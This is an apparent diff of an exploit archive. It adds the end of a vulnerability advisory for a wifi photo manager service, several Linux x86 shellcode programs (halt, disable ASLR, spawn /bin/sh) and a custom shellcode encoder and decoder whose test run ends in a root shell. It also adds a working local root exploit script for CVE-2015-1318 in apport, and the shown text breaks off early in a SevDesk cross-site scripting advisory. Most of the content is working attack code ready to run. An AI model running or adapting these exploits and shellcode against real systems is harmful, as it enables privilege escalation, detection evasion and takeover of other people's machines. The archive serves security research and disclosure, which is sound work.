|
||||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||||
X-Requested-With[XMLHttpRequest]
|
||||
Referer[http://localhost:8080/index.html]
|
||||
Content-Length[50]
|
||||
Cookie[isenabledpasscode=false]
|
||||
Connection[keep-alive]
|
||||
Pragma[no-cache]
|
||||
Cache-Control[no-cache]
|
||||
POST-Daten:
|
||||
folderName[*/-CODE EXECUTION VULNERABILITY!;]
|
||||
isSubfolder[0]
|
||||
parentFolderID[0]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[23]
|
||||
Date[Do., 05 März 2015 20:34:46 GMT]
|
||||
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/index.html
|
||||
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[9421] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:8080/browse_folder.html?folderID=6]
|
||||
Cookie[isenabledpasscode=false]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[9421]
|
||||
Date[Do., 05 März 2015 20:34:46 GMT]
|
||||
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/javascript/linkus.js
|
||||
Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[397] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[*/*]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:8080/index.html]
|
||||
Cookie[isenabledpasscode=false]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[397]
|
||||
Date[Do., 05 März 2015 20:34:46 GMT]
|
||||
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:8080/index.html
|
||||
http://localhost:8080/newfolder.action
|
||||
http://localhost:8080/index.html#?w=300
|
||||
http://localhost:8080/browse_folder.html?folderID=5
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure parse and encode of the vulnerable folderName value. Restrict the input and filter the context by usage of a own exception to
|
||||
prevent the application-side code execution.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the code execution vulnerability in the photo manager wifi service is estimated as high. (CVSS 8.6)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
||||
|
27
platforms/lin_x86-64/shellcode/36750.c
Executable file
27
platforms/lin_x86-64/shellcode/36750.c
Executable file
|
@ -0,0 +1,27 @@
|
|||
/*
|
||||
|
||||
+========================================================================================
|
||||
| # Exploit Title : linux/x86 setreuid(0, 0) + execve("/sbin/halt") + exit(0) - 49 bytes
|
||||
| # Exploit Author : Febriyanto Nugroho
|
||||
| # Tested on : Linux Debian 5.0.5
|
||||
+========================================================================================
|
||||
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
char s[] = "\x31\xc0\x31\xdb\x50\x53\x89\xe1"
|
||||
"\xb0\x46\xcd\x80\x31\xc0\x50\x68"
|
||||
"\x68\x61\x6c\x74\x68\x6e\x2f\x2f"
|
||||
"\x2f\x68\x2f\x73\x62\x69\x89\xe3"
|
||||
"\x50\x53\xb0\x0b\x89\xe1\xcd\x80"
|
||||
"\x31\xc0\x50\x89\xe3\xb0\x01\xcd"
|
||||
"\x80";
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
printf("shellcode length -> %d bytes\n", strlen(s));
|
||||
int(*fuck)() = (int(*)())s;
|
||||
fuck();
|
||||
return 0;
|
||||
}
|
64
platforms/lin_x86/shellcode/36637.c
Executable file
64
platforms/lin_x86/shellcode/36637.c
Executable file
|
@ -0,0 +1,64 @@
|
|||
/*
|
||||
#Title: Disable ASLR in Linux (less byte and more compact)
|
||||
#Length: 84 bytes
|
||||
#Date: 3 April 2015
|
||||
#Author: Mohammad Reza Ramezani (mr.ramezani.edu@gmail.com - g+)
|
||||
#Tested On: kali-linux-1.0.6-i386
|
||||
|
||||
Thanks to stackoverflow
|
||||
|
||||
|
||||
|
||||
section .text
|
||||
global _start
|
||||
|
||||
_start:
|
||||
|
||||
jmp short fileaddress
|
||||
shellcode:
|
||||
pop ebx
|
||||
xor eax,eax
|
||||
mov byte [ebx + 35],al
|
||||
push byte 5
|
||||
pop eax
|
||||
push byte 2
|
||||
pop ecx
|
||||
int 80h
|
||||
|
||||
mov ebx, eax
|
||||
push byte 4
|
||||
pop eax
|
||||
jmp short output
|
||||
cont:
|
||||
pop ecx
|
||||
push byte 2
|
||||
pop edx
|
||||
int 80h
|
||||
|
||||
push byte 1
|
||||
pop eax
|
||||
xor ebx, ebx
|
||||
int 80h
|
||||
|
||||
fileaddress:
|
||||
call shellcode
|
||||
db '/proc/sys/kernel/randomize_va_spaceX'
|
||||
|
||||
output:
|
||||
call cont
|
||||
db '0',10
|
||||
*/
|
||||
|
||||
char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58"
|
||||
"\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a
|
||||
\xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70
|
||||
\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72
|
||||
\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63
|
||||
\x65\x58\xe8\xc5\xff\xff\xff\x30\x0a";
|
||||
|
||||
int main()
|
||||
{
|
||||
int *ret;
|
||||
ret = (int *)&ret + 2;
|
||||
(*ret) = (int)shellcode;
|
||||
}
|
58
platforms/lin_x86/shellcode/36778.c
Executable file
58
platforms/lin_x86/shellcode/36778.c
Executable file
|
@ -0,0 +1,58 @@
|
|||
/*
|
||||
; Title: Linux/x86 execve "/bin/sh" - shellcode 35 bytes
|
||||
; Platform: linux/x86_64
|
||||
; Date: 2014-06-26
|
||||
; Author: Mohammad Reza Espargham
|
||||
; Simple ShellCode
|
||||
|
||||
section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: eb 17 jmp 8048079
|
||||
|
||||
08048062 :
|
||||
8048062: 5e pop %esi
|
||||
8048063: 31 d2 xor %edx,%edx
|
||||
8048065: 52 push %edx
|
||||
8048066: 56 push %esi
|
||||
8048067: 89 e1 mov %esp,%ecx
|
||||
8048069: 89 f3 mov %esi,%ebx
|
||||
804806b: 31 c0 xor %eax,%eax
|
||||
804806d: b0 0b mov $0xb,%al
|
||||
804806f: cd 80 int $0x80
|
||||
8048071: 31 db xor %ebx,%ebx
|
||||
8048073: 31 c0 xor %eax,%eax
|
||||
8048075: 40 inc %eax
|
||||
8048076: cd 80 int $0x80
|
||||
|
||||
08048078 :
|
||||
8048078: e8 e5 ff ff ff call 8048062
|
||||
804807d: 2f das
|
||||
804807e: 62 69 6e bound %ebp,0x6e(%ecx)
|
||||
8048081: 2f das
|
||||
8048082: 73 68 jae 80480ec
|
||||
*/
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <sys/mman.h>
|
||||
|
||||
#define PAGE_SIZE 4096U
|
||||
|
||||
|
||||
char code[] = {
|
||||
"\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
|
||||
"\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
|
||||
"\x6e\x2f\x73\x68"
|
||||
};
|
||||
|
||||
int
|
||||
main() {
|
||||
|
||||
printf("Shellcode Length: %d\n", (int)strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
|
||||
return 0;
|
||||
}
|
268
platforms/lin_x86/shellcode/36781.py
Executable file
268
platforms/lin_x86/shellcode/36781.py
Executable file
|
@ -0,0 +1,268 @@
|
|||
/*
|
||||
Followtheleader custom execve-shellcode Encoder/Decoder - Linux Intel/x86
|
||||
Author: Konstantinos Alexiou
|
||||
*/
|
||||
------------------------------------------------------------------------------------------------------------------
|
||||
a)Python script. Encoder for shellcode (execve)
|
||||
------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
#!/usr/bin/python
|
||||
# Author:Konstantinos Alexiou
|
||||
# Encoding name: Followtheleader-encoder
|
||||
# Description: Custom execve-shellcode encoder based on a given byte which is used to encode the execve shellcode
|
||||
import random
|
||||
import sys
|
||||
shellcode =('\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80')
|
||||
|
||||
total = len(sys.argv)
|
||||
if total != 2:
|
||||
print '!!Give the LEADER byte'
|
||||
print 'Script must run as: python xxx.py LEADER'
|
||||
print 'LEADER is any integer between 17-255'
|
||||
print 'e.g python Followtheleader.py 32'
|
||||
else:
|
||||
try:
|
||||
leader = int(sys.argv[1])
|
||||
fb = int(hex(leader)[2:3],16) # Split the LEADER. If leader = AF -->fb=A
|
||||
sb = int(hex(leader)[3:],16) # Split the LEADER. If LEADER = AF -->sb=F
|
||||
encoded = ' '
|
||||
encoded2 = ' '
|
||||
encoded = '\\x'
|
||||
encoded += hex(leader)[2:] # FIRST byte the LEADER
|
||||
encoded2 = '0x'
|
||||
encoded2 += hex(leader)[2:]
|
||||
i=0
|
||||
for x in bytearray(shellcode): # READ every Instruction as BYTE
|
||||
i +=1
|
||||
hopcode = '%02x' %x # KEEP only the HEX value of opcode
|
||||
Dec_hopcode = int(hopcode, 16) # CALCULATE the DECIMAL value of opcode
|
||||
suplX = 255 - Dec_hopcode # CALCULATE the SUPPLEMENT
|
||||
rev_suplx = hex(suplX)[::-1] # REVERT the bytes of SUPPLEMENT (ae --> ea)
|
||||
subfs = fb-sb
|
||||
#----------------------------The Encoded byte ----------------------------------------------------
|
||||
xxx = hex(int(abs(subfs)) + int(rev_suplx[0:2],16))
|
||||
#-------------------------------------------------------------------------------------------------
|
||||
if len(xxx)>4: # Check if xxx > 0xff
|
||||
print 'Overflow encoding.Try again!!!.'
|
||||
sys.exit()
|
||||
elif xxx == '0x0': # Check if ZERO byte was encoded
|
||||
print 'A byte was Encoded as 0x00 .Try again!!!'
|
||||
sys.exit()
|
||||
encoded += '\\x' # Put \x first
|
||||
encoded += xxx[2:] # Put the xxx afterwards
|
||||
insertByte = hex(random.randint(1,255)) # Put a Random byte
|
||||
encoded += '\\x'
|
||||
encoded += insertByte[2:]
|
||||
i +=1
|
||||
encoded2 += ','
|
||||
encoded2 += xxx
|
||||
encoded2 += ','
|
||||
encoded2 += '0x'
|
||||
encoded2 += insertByte[2:]
|
||||
print ' *************';
|
||||
print ' LEADER BYTE :decimal(%d), HEX(0x%x)' %(int(sys.argv[1]),leader)
|
||||
print ' *************';
|
||||
print 'Len of Shellcode: %02d' % i
|
||||
print '------------------------------------------------------------------------';
|
||||
print ' 1. Style:= %s ' % encoded
|
||||
print '------------------------------------------------------------------------';
|
||||
print ' 2. Style:= %s ' % encoded2
|
||||
print '------------------------------------------------------------------------';
|
||||
except:
|
||||
print "exiting..."
|
||||
---------------------------------------------------------------------------------------
|
||||
|
||||
|
||||
Followtheleader Encoder test run :
|
||||
|
||||
$ python Followtheleader-encoder.py 67
|
||||
*************
|
||||
LEADER BYTE :decimal(67), HEX(0x43)
|
||||
*************
|
||||
Len of Shellcode: 50
|
||||
------------------------------------------------------------------------
|
||||
1. Style:= \x43\xed\x1d\xf4\x40\xfb\x6f\x7a\xa9\xe\xb6\xe\xbc\xc9\xe3\x7a\xaf\x7a\x78
|
||||
\xe\xc5\xda\x76\x6a\x17\x1a\x4e\x68\x38\xc2\x99\xfb\x35\x68\x84\xd2\xb3\xcb\x7c\x68\x78
|
||||
\xe2\x9a\xf5\xe9\x50\xc0\x24\x91\xf8\xfe
|
||||
------------------------------------------------------------------------
|
||||
2. Style:= 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,
|
||||
0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,
|
||||
0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe
|
||||
------------------------------------------------------------------------
|
||||
|
||||
|
||||
b) Decoder for the encoded shellcode (execve-stack)
|
||||
---------------------------------------------------------------------------------------
|
||||
$ cat Followtheleader-decoder.nasm
|
||||
; Filename: Followtheleader-decoder.nasm
|
||||
; Author: Konstantinos Alexiou
|
||||
; Description: Followtheleader custom insertion Encoder, Linux Intel/x86
|
||||
|
||||
global _start
|
||||
section .text
|
||||
|
||||
_start:
|
||||
jmp short call_shellcode
|
||||
|
||||
decoder:
|
||||
pop esi ; Address of EncodedShellcode to ESI
|
||||
lea edi, [esi] ; Load effective address of what is contained on EDI
|
||||
xor ecx, ecx ; Zero ECX
|
||||
mul ecx ; This instruction will cause both EAX and EDX to become zero
|
||||
xor ebp, ebp ; Zero the value on EBP
|
||||
mov dl, byte [esi] ; Put the LEADER byte to EDX (DL)
|
||||
|
||||
;(firstb - secondb) CALCULATION
|
||||
mov al, dl ; Copy the LEADER to EAX
|
||||
|
||||
;firstb extraction of LEADER
|
||||
shr dl, 4 ; Keep only the 4 high bits of LEADER to DL (if Leader=ac then DL=a) [firstb]
|
||||
|
||||
;secondb extraction of LEADER
|
||||
shl eax, 28 ; shift left 28 bits of EAX which contains the value of Leader on al
|
||||
shr eax, 28 ; shift right 28 of EAX (if EAX=0xc0000000 now EAX=0x0000000c) [secondb]
|
||||
sub dl, al ; (firstb - secondb) value stored to EDX (DL)
|
||||
jns decode_pr
|
||||
|
||||
negative: ; Calculate the absolute value if negative
|
||||
not dl
|
||||
inc dl
|
||||
|
||||
;decode process
|
||||
decode_pr:
|
||||
|
||||
xor eax, eax
|
||||
xor ebx, ebx
|
||||
xor ecx, ecx
|
||||
|
||||
mov al, byte [esi+1+ebp] ; Put the encoded byte to EAX
|
||||
mov ecx, ebp ; EBP is used as a counter copy the value of EBP to ECX
|
||||
xor cl, 0x32 ; At the end of the shellcode EBP should point 50 in decimal 32 in hex
|
||||
je short EncodedShellcode
|
||||
|
||||
;rev_suplx Calculation
|
||||
mov cl, al ; Put the Encoded byte to EAX (xxx to EAX)
|
||||
sub cl, dl ; rev_suplx= xxx-(firstb - secondb) value stored to CL
|
||||
mov bl, cl ; Keep Backup of rev_suplx to BL
|
||||
mov al, cl ; Second backup of CL
|
||||
|
||||
;Revert the bytes on rev_suplx
|
||||
shr bl, 4 ; shift 4 bits right (if was bl=ec now bl=e)
|
||||
shl eax, 28 ; shift left 28 bits of EAX which contains the value of rev_supl on cl( if EAX was 0xec now EAX=0xc0000000)
|
||||
shr eax, 24 ; shift right 24 of EAX (if EAX=0xc0000000 now EAX=0x000000c0)
|
||||
add eax, ebx ; add the value on EBX to EAX (if EAX=0x000000c0 + BL=0xe, EAX=0x0000000ce)
|
||||
|
||||
;Supplement Calculation
|
||||
mov bl, 0xff ; Value of 0xff to BL
|
||||
sub bl, al ; Calculate the Supplement
|
||||
mov byte [edi], bl ; Put the decoded byte to the position of EDI
|
||||
inc edi ; EDI is a pointer to the position which the decoded bytes will be stored
|
||||
add ebp,0x2 ; The EBP is a counter values will be (2,4,6,..50)
|
||||
|
||||
jmp short decode_pr ; Goto the decode process to decode the next bytes
|
||||
|
||||
call_shellcode:
|
||||
call decoder
|
||||
EncodedShellcode: db 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe
|
||||
|
||||
|
||||
---------------------------------------------------------------------------------------------------------------------------------------
|
||||
$ objdump -d ./Followtheleader-decoder -M intel
|
||||
|
||||
./Followtheleader-decoder: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: eb 4e jmp 80480b0 <call_shellcode>
|
||||
|
||||
08048062 <decoder>:
|
||||
8048062: 5e pop esi
|
||||
8048063: 8d 3e lea edi,[esi]
|
||||
8048065: 31 c9 xor ecx,ecx
|
||||
8048067: f7 e1 mul ecx
|
||||
8048069: 31 ed xor ebp,ebp
|
||||
804806b: 8a 16 mov dl,BYTE PTR [esi]
|
||||
804806d: 88 d0 mov al,dl
|
||||
804806f: c0 ea 04 shr dl,0x4
|
||||
8048072: c1 e0 1c shl eax,0x1c
|
||||
8048075: c1 e8 1c shr eax,0x1c
|
||||
8048078: 28 c2 sub dl,al
|
||||
804807a: 79 04 jns 8048080 <decode_pr>
|
||||
|
||||
0804807c <negative>:
|
||||
804807c: f6 d2 not dl
|
||||
804807e: fe c2 inc dl
|
||||
|
||||
08048080 <decode_pr>:
|
||||
8048080: 31 c0 xor eax,eax
|
||||
8048082: 31 db xor ebx,ebx
|
||||
8048084: 31 c9 xor ecx,ecx
|
||||
8048086: 8a 44 2e 01 mov al,BYTE PTR [esi+ebp*1+0x1]
|
||||
804808a: 89 e9 mov ecx,ebp
|
||||
804808c: 80 f1 32 xor cl,0x32
|
||||
804808f: 74 24 je 80480b5 <EncodedShellcode>
|
||||
8048091: 88 c1 mov cl,al
|
||||
8048093: 28 d1 sub cl,dl
|
||||
8048095: 88 cb mov bl,cl
|
||||
8048097: 88 c8 mov al,cl
|
||||
8048099: c0 eb 04 shr bl,0x4
|
||||
804809c: c1 e0 1c shl eax,0x1c
|
||||
804809f: c1 e8 18 shr eax,0x18
|
||||
80480a2: 01 d8 add eax,ebx
|
||||
80480a4: b3 ff mov bl,0xff
|
||||
80480a6: 28 c3 sub bl,al
|
||||
80480a8: 88 1f mov BYTE PTR [edi],bl
|
||||
80480aa: 47 inc edi
|
||||
80480ab: 83 c5 02 add ebp,0x2
|
||||
80480ae: eb d0 jmp 8048080 <decode_pr>
|
||||
|
||||
080480b0 <call_shellcode>:
|
||||
80480b0: e8 ad ff ff ff call 8048062 <decoder>
|
||||
|
||||
080480b5 <EncodedShellcode>:
|
||||
80480b5: 43 inc ebx
|
||||
80480b6: ed in eax,dx
|
||||
80480b7: 1d f4 40 fb 6f sbb eax,0x6ffb40f4
|
||||
80480bc: 7a a9 jp 8048067 <decoder+0x5>
|
||||
80480be: 0e push cs
|
||||
80480bf: b6 0e mov dh,0xe
|
||||
80480c1: bc c9 e3 7a af mov esp,0xaf7ae3c9
|
||||
80480c6: 7a 78 jp 8048140 <EncodedShellcode+0x8b>
|
||||
80480c8: 0e push cs
|
||||
80480c9: c5 da 76 (bad)
|
||||
80480cc: 6a 17 push 0x17
|
||||
80480ce: 1a 4e 68 sbb cl,BYTE PTR [esi+0x68]
|
||||
80480d1: 38 c2 cmp dl,al
|
||||
80480d3: 99 cdq
|
||||
80480d4: fb sti
|
||||
80480d5: 35 68 84 d2 b3 xor eax,0xb3d28468
|
||||
80480da: cb retf
|
||||
80480db: 7c 68 jl 8048145 <EncodedShellcode+0x90>
|
||||
80480dd: 78 e2 js 80480c1 <EncodedShellcode+0xc>
|
||||
80480df: 9a f5 e9 50 c0 24 91 call 0x9124:0xc050e9f5
|
||||
80480e6: f8 clc
|
||||
80480e7: fe .byte 0xfe
|
||||
-------------------------------------------------------------------------------------------
|
||||
|
||||
$ cat shellcode.c
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
unsigned char code[] =\
|
||||
"\xeb\x4e\x5e\x8d\x3e\x31\xc9\xf7\xe1\x31\xed\x8a\x16\x88\xd0\xc0\xea\x04\xc1\xe0\x1c\xc1\xe8\x1c\x28\xc2\x79\x04\xf6\xd2\xfe\xc2\x31\xc0\x31\xdb\x31\xc9\x8a\x44\x2e\x01\x89\xe9\x80\xf1\x32\x74\x24\x88\xc1\x28\xd1\x88\xcb\x88\xc8\xc0\xeb\x04\xc1\xe0\x1c\xc1\xe8\x18\x01\xd8\xb3\xff\x28\xc3\x88\x1f\x47\x83\xc5\x02\xeb\xd0\xe8\xad\xff\xff\xff\x43\xed\x1d\xf4\x40\xfb\x6f\x7a\xa9\x0e\xb6\x0e\xbc\xc9\xe3\x7a\xaf\x7a\x78\x0e\xc5\xda\x76\x6a\x17\x1a\x4e\x68\x38\xc2\x99\xfb\x35\x68\x84\xd2\xb3\xcb\x7c\x68\x78\xe2\x9a\xf5\xe9\x50\xc0\x24\x91\xf8\xfe";
|
||||
|
||||
main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
}
|
||||
-------------------------------------------------------------------------------------------
|
||||
|
||||
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
|
||||
$ ./shellcode
|
||||
Shellcode Length: 136
|
||||
$whoami
|
||||
root
|
||||
$
|
69
platforms/linux/local/36782.sh
Executable file
69
platforms/linux/local/36782.sh
Executable file
|
@ -0,0 +1,69 @@
|
|||
#!/bin/sh
|
||||
#
|
||||
# CVE-2015-1318
|
||||
#
|
||||
# Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
|
||||
#
|
||||
# Example:
|
||||
#
|
||||
# % uname -a
|
||||
# Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
|
||||
#
|
||||
# % lsb_release -a
|
||||
# No LSB modules are available.
|
||||
# Distributor ID: Ubuntu
|
||||
# Description: Ubuntu 14.04.2 LTS
|
||||
# Release: 14.04
|
||||
# Codename: trusty
|
||||
#
|
||||
# % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 " " $3 }'
|
||||
# apport 2.14.1-0ubuntu3.8
|
||||
#
|
||||
# % id
|
||||
# uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...)
|
||||
#
|
||||
# % ./apport.sh
|
||||
# pwned-4.3# id
|
||||
# uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...)
|
||||
# pwned-4.3# exit
|
||||
|
||||
TEMPDIR=$(mktemp -d)
|
||||
|
||||
cd ${TEMPDIR}
|
||||
|
||||
cp /bin/busybox .
|
||||
|
||||
mkdir -p dev mnt usr/share/apport
|
||||
|
||||
(
|
||||
cat << EOF
|
||||
#!/busybox sh
|
||||
(
|
||||
cp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned
|
||||
chmod 5755 /mnt/1/root/tmp/pwned
|
||||
)
|
||||
EOF
|
||||
|
||||
) > usr/share/apport/apport
|
||||
|
||||
chmod +x usr/share/apport/apport
|
||||
|
||||
(
|
||||
cat << EOF
|
||||
mount -o bind . .
|
||||
cd .
|
||||
mount --rbind /proc mnt
|
||||
touch dev/null
|
||||
pivot_root . .
|
||||
./busybox sleep 500 &
|
||||
SLEEP=\$!
|
||||
./busybox sleep 1
|
||||
./busybox kill -11 \$SLEEP
|
||||
./busybox sleep 5
|
||||
EOF
|
||||
) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \
|
||||
lxc-unshare -s "MOUNT|PID|NETWORK|UTSNAME|IPC" -- /bin/sh 2>&1 >/dev/null
|
||||
|
||||
/tmp/pwned -p
|
||||
|
||||
rm -Rf ${TEMPDIR}
|
264
platforms/multiple/webapps/36794.txt
Executable file
264
platforms/multiple/webapps/36794.txt
Executable file
|
@ -0,0 +1,264 @@
|
|||
Document Title:
|
||||
===============
|
||||
SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1314
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-03-23
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1314
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.9
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
The integrated customer management, digital customer file is the central record for a single customer. invoices, facilities and operations
|
||||
to a customer are stored centrally automated in one place. So the customer file is always up to date. For faster retrieval or reporting
|
||||
contacts can be tagged. In addition, with powerful. Search options you have as the entire customer base better than ever in view.
|
||||
|
||||
Daily backup
|
||||
256bit SSL encryption
|
||||
TÜV certified datacenter
|
||||
|
||||
Free version
|
||||
No hidden costs
|
||||
No minimum contract term
|
||||
|
||||
iPhone App
|
||||
Runs in any browser
|
||||
No installation required on the PC
|
||||
|
||||
Easy to use
|
||||
Reduced to the essentials
|
||||
Automated, where it is only Possible
|
||||
|
||||
(Copy of the Vendor Homepage: https://sevdesk.de/)
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk v3.10 web-application & cloud online-service.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
|
||||
2014-09-02: Vendor Notification (SevDesk Developer Team)
|
||||
2014-09-07: Vendor Response/Feedback (SevDesk Developer Team)
|
||||
2015-02-01: Vendor Fix/Patch Notification (SevDesk Developer Team)
|
||||
2015-03-23: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
SevenIT
|
||||
Product: SevDesk - Web Application 3.1.0
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
Multiple persistent input validation web vulnerabilities are detected in the official SEVENIT Software GmbH - sevDesk v3.10 web-application.
|
||||
The vulnerability allows remote attackers or low privileged user account to inject own malicious script codes to the application-side of the
|
||||
vulnerable web-application module or service.
|
||||
|
||||
The security vulnerability is located in the `firstname`, `surname` & `family` name values of the main sevDesk `Dasboard` application module.
|
||||
Remote attackers are able to inject own codes to the main dashboard service by manipulation of the registration username. The execution of
|
||||
